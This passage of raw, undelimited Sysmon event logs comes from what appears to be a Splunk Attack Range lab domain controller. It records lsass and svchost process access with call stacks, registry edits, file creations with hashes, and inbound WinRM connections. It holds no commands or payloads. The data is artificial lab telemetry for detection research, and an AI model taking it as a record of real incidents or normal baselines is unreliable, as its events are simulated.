12:00:04.639{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.108{266CAFBE-641B-6064-3202-00000000AD01}5032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=A6C93EF11B43F8A31C4600397CBFF244,SHA256=2FE2E98A7E44C6FEE8F32C20338A7C17B993D186FAE65A8FB8A67CF29FEFE5BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.804{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53837-false10.0.1.14win-dc-892.attackrange.local5986- 354300x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.602{266CAFBE-6410-6064-DF01-00000000AD01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local65326-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.583{266CAFBE-6410-6064-DF01-00000000AD01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local65325-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.749{266CAFBE-62C7-6064-0100-00000000AD01}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse46.128.24.6446.128.24.64.dynamic.cablesurf.de53836-false10.0.1.14win-dc-892.attackrange.local5986- 23542300x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-1200-00000000AD01}1268NT AUTHORITY\LOCAL 
SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4523B49C392D2CDA6C170D4F2584C9EF,SHA256=645BF4E35F65927C479015F178C3A45AC2B9559FDB52D4B9652451C963C1A752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-1200-00000000AD01}1268NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=45834993BD0C5907E0C5CDE025B44D95,SHA256=6C04030E0C8FF335147076716CCA99EF3234AAAE14F2A4146591C3BF6B786C6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:05.460{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.460{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001e) 13241300x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001e) 12241200x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30 13241300x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000001) 12241200x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-DeleteValue2021-03-31 12:00:05.460{266CAFBE-62C7-6064-0100-00000000AD01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1 13241300x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.425{266CAFBE-62DD-6064-1300-00000000AD01}1276C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.425{266CAFBE-62DD-6064-1300-00000000AD01}1276C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 
13241300x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:05.426{266CAFBE-62DD-6064-1000-00000000AD01}1144C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000000) 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.014{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:05.014{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:05.014{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.998{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.blfMD5=7564C9B3687156E3882453F6D8B316F7,SHA256=79A0467E4D6419EF766D96D6B4FDC16CB8ACCAA26D58D22A43CCE0B256619838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.998{266CAFBE-642D-6064-9002-00000000AD01}4580NT AUTHORITY\SYSTEMC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exeC:\Windows\System32\config\COMPONENTS{5a78f163-4b54-11e6-80cb-e41d2d012050}.TxR.2.regtrans-msMD5=B6D81B360A5672D80C27430F39153E2C,SHA256=30E14955EBF1352266DC2FF8067E68104607E750ABB9D3B36582B8AF909FCB58,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 13241300x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000000) 13241300x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:46.799{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.393{266CAFBE-646E-6064-2100-00000000AE01}24682488C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.393{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Schedule\FailureActionsBinary Data 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-2100-00000000AE01}2468C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.377{266CAFBE-646C-6064-1000-00000000AE01}11242420C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-2000-00000000AE01}2456C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a7a1|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+d395|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.377{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.315{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2021-03-31 12:00:46.315 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:46.315{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.252{266CAFBE-646E-6064-1E00-00000000AE01}23322404C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.252{266CAFBE-646E-6064-1D00-00000000AE01}23122396C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:46.252{266CAFBE-646E-6064-1C00-00000000AE01}23042400C:\Windows\system32\conhost.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\DriverMajorVersionDWORD (0x00000001) 13241300x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.237{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:46.221{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\tunnel\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
